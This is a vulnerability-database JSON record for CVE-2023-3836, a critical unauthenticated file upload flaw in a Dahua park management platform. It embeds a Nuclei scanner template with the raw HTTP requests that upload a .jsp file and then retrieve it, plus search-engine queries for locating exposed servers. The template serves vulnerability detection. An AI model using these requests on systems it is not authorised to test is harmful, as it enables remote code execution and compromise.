{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-3836/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-3836/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-3836/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-3836/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-3836/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-3836"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-3836"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-3836.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-3836\n\ninfo:\n  name: Dahua Smart Park Management - Arbitrary File Upload\n  author: HuTa0\n  severity: critical\n  description: |\n    Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n  impact: |\n    Unauthenticated attackers can upload arbitrary files to the Dahua wisdom park management platform, potentially enabling remote code execution and complete system compromise.\n  remediation: |\n    Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.\n  reference:\n    - https://github.com/qiuhuihk/cve/blob/main/upload.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-3836\n    - https://vuldb.com/?ctiid.235162\n    - https://vuldb.com/?id.235162\n    - https://github.com/1f3lse/taiE\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-3836\n    cwe-id: CWE-434\n    epss-score: 0.7367\n    epss-percentile: 0.99457\n    cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: dahuasecurity\n    product: smart_parking_management\n    shodan-query:\n      - html:\"/WPMS/asset\"\n      - http.html:\"/wpms/asset\"\n    fofa-query: body=\"/wpms/asset\"\n    zoomeye-query: app=\"大华智慧园区综合管理平台\"\n  tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity,vkev,vuln\nvariables:\n  random_str: \"{{rand_base(6)}}\"\n  match_str: \"{{md5(random_str)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\n        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\n        Host: {{Hostname}}\n\n        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\n        Content-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\n        Content-Type: application/octet-stream\n        Content-Transfer-Encoding: binary\n\n        {{match_str}}\n        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n      - |\n        GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code_1 == 200 && status_code_2 == 200\"\n          - \"contains(body_2, '{{match_str}}')\"\n        condition: and\n\n    extractors:\n      - type: regex\n        name: shell_filename\n        internal: true\n        part: body_1\n        regex:\n          - 'ico_res_(\\w+)_on\\.jsp'\n# digest: 4b0a00483046022100c7f0cfc1e4d76bc00c0f768f30379b73bd8fc94224877b75fac6be4ac515836e022100eaf8b0685ad268e9d08fb97687dfac21900ad530356a54669e3efc77978aeaf0:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-3836"
}